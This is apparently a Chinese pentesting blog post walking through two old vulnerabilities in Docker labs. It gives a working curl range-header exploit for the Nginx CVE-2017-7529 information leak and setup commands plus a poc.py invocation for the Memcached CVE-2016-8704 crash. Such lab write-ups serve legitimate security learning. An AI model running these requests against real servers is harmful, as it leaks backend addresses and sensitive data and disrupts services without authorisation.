分享两个渗透测试中容易忽略的小漏洞

Nginx整数溢出漏洞 CVE-2017-7529

• 漏洞信息

• 当使用nginx标准模块时，攻击者可以通过发送包含恶意构造range 域的 header 请求，来获取响应中的缓存文件头部信息。在某些配置中，缓存文件头可能包含后端服务器的IP地址或其它敏感信息，从而导致信息泄露。

• 参考：【漏洞分析】Nginx range 过滤器整形溢出漏洞(CVE–2017–7529)预警分析

• 漏洞影响

• 该漏洞影响所有 0.5.6 - 1.13.2版本内默认配置模块的Nginx只需要开启缓存攻击者即可发送恶意请求进行远程攻击造成信息泄露。

• 当Nginx服务器使用代理缓存的情况下攻击者通过利用该漏洞可以拿到服务器的后端真实IP或其他敏感信息。

• 通过我们的分析判定该漏洞利用难度低可以归属于low-hanging-fruit的漏洞在真实网络攻击中也有一定利用价值。

• 影响版本

• Nginx version 0.5.6 - 1.13.2

• 修复版本

• Nginx version 1.13.3, 1.12.1

利用方法

• docker pull medicean/vulapps:n_nginx_1

• docker run -d -p 9000:80 medicean/vulapps:n_nginx_1

• curl -I http://ip:port/proxy/demo.png

• 看到 Content-Length: 16585, 找个比这个数大的值，例如 17208, 第二个 range 值为 0x8000000000000000-17208, 也就是 9223372036854758600

• curl -i http://ip:port/proxy/demo.png -r -17208,-9223372036854758600

泄露出的信息

Memcached Server APPEND/PREPEND 远程代码执行漏洞

Memcached被曝存在多个整数溢出漏洞（CVE-2016-8704、CVE-2016-8705、CVE-2016-8706），可导致远程代码执行。这些漏洞存在于用于插入（inserting）、附加（appending,）、前置（appending）、修改键值对的函数中，在SASL身份验证位置也存在问题。 攻击者可以通过向服务器发送一个精心构造的Memcached命令实现该漏洞的利用。此外，这些漏洞还可以泄露敏感的进程信息，并且可以多次触发，利用这些敏感的进程信息，攻击者可以绕过像ASLR等常见的漏洞缓解机制。 漏洞披露：2016年10月10日 漏洞修补：2016年10月12 日 公开发布：2016年10月31日

利用方法

• docker pull medicean/vulapps:m_memcached_CVE-2016-8704

• docker run -d -p 11211:11211medicean/vulapps:m_memcached_CVE-2016-8704

• python poc.py 被攻击机 11211

执行完之后服务崩溃